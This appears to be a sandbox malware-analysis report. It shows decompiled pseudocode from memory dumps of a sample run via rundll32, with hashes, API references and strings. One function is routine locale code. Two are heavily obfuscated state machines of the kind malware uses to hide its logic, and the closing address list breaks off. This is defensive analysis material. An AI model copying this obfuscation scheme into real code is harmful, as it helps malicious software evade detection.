String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: 6f9a5e51f697d6dcdfd3ce5dd948e46f4e43d095367734ce79e186845609afa1
Instruction ID: 2b2f26f7100daa4967706f62292c38eff6d5cc90549dfd0c72ccd025497b841a
Opcode Fuzzy Hash: 6f9a5e51f697d6dcdfd3ce5dd948e46f4e43d095367734ce79e186845609afa1
Instruction Fuzzy Hash: 9C819671519341EFD368CF25C98A55BFBE2BBD0B08F90480DF181962A0D7B58A6ACF43

Uniqueness

Uniqueness Score: -1.00%

Function 100303BF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E100303BF(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E10023FB6(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E10030352(0x10045ee8, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E1002FC7D(_t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E1002FD9D();
					} else {
						E1002FD04(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E10030352(0x10045bd8, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E1002FD9D();
							} else {
								E1002FD04(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E100301C9(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E1002FBCB(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E1000E341();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1004d054; // 0x944e5696
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E10023FB6(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E10023FB6(_t97, _t114) + 0x34c);
								_t127 = E10030B18(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E1003880F(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E10030C4A(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								return E100037EA(_t62, _v32 ^ _t130, _t114);
							} else {
								if(E1002A1D1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E1002A1D1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E10041C3B(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E1002A1D1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E10041C3B(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E10038569(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E1002FBCB(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x100303c4
0x100303c5
0x100303c7
0x100303cc
0x100303d3
0x100303d5
0x100303d8
0x100303d8
0x100303db
0x100303db
0x100303e1
0x100303e4
0x100303e7
0x100303e7
0x100303ea
0x100303ed
0x100303ef
0x100303f5
0x100303f7
0x100303fc
0x10030406
0x1003040b
0x1003040d
0x10030410
0x10030410
0x10030412
0x10030416
0x1003045f
0x00000000
0x10030418
0x1003041d
0x10030426
0x1003041f
0x1003041f
0x1003041f
0x10030431
0x1003043b
0x10030440
0x10030445
0x1003044b
0x1003044f
0x10030458
0x10030451
0x10030451
0x10030451
0x10030464
0x10030464
0x10030445
0x10030431
0x1003046a
0x100305a6
0x100305a6
0x00000000
0x10030470
0x10030470
0x10030479
0x1003048a
0x10030480
0x10030480
0x10030480
0x10030491
0x10030495
0x00000000
0x100304b9
0x100304b9
0x100304be
0x100304c0
0x100304c0
0x100304c2
0x100304c7
0x100305a1
0x100305a3
0x100305a8
0x100305ac
0x100304cd
0x100304cd
0x100304d0
0x100304d0
0x100304d8
0x100304db
0x100304db
0x100304de
0x100304de
0x100304e1
0x100304e4
0x100304ee
0x100304f8
0x100304fd
0x10030502
0x100305ad
0x100305af
0x100305b0
0x100305b1
0x100305b2
0x100305b3
0x100305b4
0x100305b9
0x100305bd
0x100305c5
0x100305cc
0x100305cf
0x100305d0
0x100305d4
0x100305d5
0x100305da
0x100305e2
0x100305f1
0x100305fd
0x1003060e
0x10030616
0x10030630
0x1003063d
0x10030640
0x10030643
0x10030643
0x1003064d
0x10030618
0x10030618
0x1003061a
0x1003061a
0x1003065e
0x10030508
0x10030518
0x00000000
0x1003051e
0x10030520
0x10030520
0x1003052c
0x1003053a
0x00000000
0x1003053c
0x1003053c
0x1003053f
0x10030545
0x10030548
0x10030558
0x1003055d
0x1003056b
0x00000000
0x00000000
0x00000000
0x00000000
0x1003054a
0x1003054a
0x1003054d
0x10030553
0x10030556
0x1003056d
0x1003056d
0x10030579
0x10030599
0x00000000
0x1003057b
0x1003057b
0x10030585
0x1003058a
0x1003058f
0x00000000
0x10030591
0x00000000
0x10030591
0x1003058f
0x00000000
0x00000000
0x00000000
0x10030556
0x10030548
0x1003053a
0x10030518
0x10030502
0x100304c7
0x10030495

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

GetACP.KERNEL32(?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030480
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?), ref: 100304AB
_wcschr.LIBVCRUNTIME ref: 1003053F
_wcschr.LIBVCRUNTIME ref: 1003054D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 1003060E

Strings

utf8, xrefs: 1003057D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction ID: b55e07c89fb835d358cde5702a7072b0253a21d250fe5499c22d51fbea95a080
Opcode Fuzzy Hash: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction Fuzzy Hash: 7D711675A02606AFE716DB35DC52BAB73E8EF49382F114439FA45DF181EB70EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 00219B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00219B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0020602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x21ca20; // 0x0
							_t260 = E00211B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0020F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00212674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00208736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x21ca20; // 0x0
						E002055D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x21ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0021838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00205F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00219b49
0x00219b53
0x00219b54
0x00219b5b
0x00219b5d
0x00219b5e
0x00219b5f
0x00219b64
0x00219b6c
0x00219b6f
0x00219b7b
0x00219b7d
0x00219b84
0x00219b87
0x00219b8b
0x00219b93
0x00219b9b
0x00219ba3
0x00219ba8
0x00219bb0
0x00219bb8
0x00219bc5
0x00219bc9
0x00219bd1
0x00219bd9
0x00219be1
0x00219be9
0x00219bf1
0x00219bf9
0x00219c01
0x00219c09
0x00219c11
0x00219c19
0x00219c21
0x00219c29
0x00219c2e
0x00219c36
0x00219c3e
0x00219c46
0x00219c4e
0x00219c56
0x00219c5e
0x00219c63
0x00219c6b
0x00219c73
0x00219c7b
0x00219c83
0x00219c87
0x00219c8f
0x00219c97
0x00219c9f
0x00219ca7
0x00219caf
0x00219cb7
0x00219cbc
0x00219cc4
0x00219cd4
0x00219cd8
0x00219ce0
0x00219ce8
0x00219cf0
0x00219cf5
0x00219cfd
0x00219d09
0x00219d0c
0x00219d10
0x00219d18
0x00219d20
0x00219d26
0x00219d2b
0x00219d33
0x00219d3b
0x00219d43
0x00219d4b
0x00219d5a
0x00219d5d
0x00219d61
0x00219d69
0x00219d71
0x00219d76
0x00219d7e
0x00219d86
0x00219d93
0x00219d97
0x00219d9f
0x00219da7
0x00219daf
0x00219db7
0x00219dbf
0x00219dc7
0x00219dcc
0x00219dd4
0x00219de4
0x00219de8
0x00219df0
0x00219df8
0x00219e04
0x00219e09
0x00219e0f
0x00219e14
0x00219e1c
0x00219e24
0x00219e2c
0x00219e31
0x00219e39
0x00219e3e
0x00219e46
0x00219e4e
0x00219e56
0x00219e5e
0x00219e66
0x00219e72
0x00219e75
0x00219e7c
0x00219e85
0x00219e89
0x00219e91
0x00219e91
0x00219e95
0x00219e95
0x00219e95
0x00219e9b
0x00000000
0x00000000
0x0021a010
0x0021a04c
0x0021a064
0x0021a069
0x0021a06e
0x0021a07a
0x0021a07f
0x0021a085
0x0021a0a5
0x0021a0ae
0x0021a0ae
0x00219e91
0x00219e91
0x00000000
0x00219e91
0x00219e91
0x0021a070
0x00219e91
0x00219e91
0x00000000
0x00219e91
0x00219e91
0x0021a018
0x0021a038
0x00000000
0x00000000
0x0021a03a
0x00000000
0x0021a03a
0x0021a020
0x0021a08e
0x0021a09e
0x0021a0a4
0x00000000
0x0021a08e
0x0021a028
0x00000000
0x00000000
0x0021a02a
0x0021a02a
0x00219ea1
0x00219ff8
0x00219ffd
0x0021a000
0x00219e91
0x00219e91
0x00000000
0x00219e91
0x00219e91
0x00219ead
0x00219f9c
0x00219fab
0x00219fac
0x00219fb0
0x00219fb5
0x00219fbb
0x00000000
0x00000000
0x00219fc1
0x00219fc3
0x00219fcb
0x00219fd2
0x00219fd5
0x00219fd9
0x00000000
0x00219fd9
0x00219eb9
0x00219f8c
0x00000000
0x00219f8c
0x00219ec5
0x00219f42
0x00219f6f
0x00219f74
0x00219f79
0x00219f81
0x00219e91
0x00219e91
0x00000000
0x00219e91
0x00219e91
0x00219ecd
0x00219efb
0x00219f00
0x00219f01
0x00219f24
0x00219f2b
0x00219f31
0x00219f34
0x00219e91
0x00219e91
0x00000000
0x00219e91
0x00219e91
0x00219ed5
0x00000000
0x00000000
0x00219eeb
0x00219eec
0x00219eed
0x00219ef4
0x00219ef4

Strings

$R, xrefs: 00219E31
v+, xrefs: 00219DBF
/,, xrefs: 00219C63
', xrefs: 00219DD4
b=, xrefs: 00219C97
0], xrefs: 00219D10
K., xrefs: 00219BD1
!t, xrefs: 00219D33

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 6564b3171b896f2894920b307d1b79c10fb4043bf74f1ebf31191d47805afba4
Instruction ID: ae075b01eb7bd0d482399132d4c38f2635418702fbe7d6f8649691916755dbe6
Opcode Fuzzy Hash: 6564b3171b896f2894920b307d1b79c10fb4043bf74f1ebf31191d47805afba4
Instruction Fuzzy Hash: 16D145711183418FD768CF65C48991FBBE1FB98708F208A1DF596862A0D7BAC999CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002112E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002112E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0020B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002028CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00205AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0021A889(_v1068, _v1064,  &_v1040);
							E00202BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00207B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x21ca2c; // 0x495cc8
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0021889D(0x21c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x21ca2c; // 0x495cc8
						_t197 = _t293 + 0x230; // 0x660053
						E0020C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x21ca2c, _t257,  &_v520);
						_t256 = E00212025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002163C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x002112e2
0x002112e8
0x002112ef
0x002112f4
0x002112f9
0x00211301
0x00211309
0x00211311
0x00211319
0x00211321
0x00211332
0x0021133c
0x00211341
0x00211347
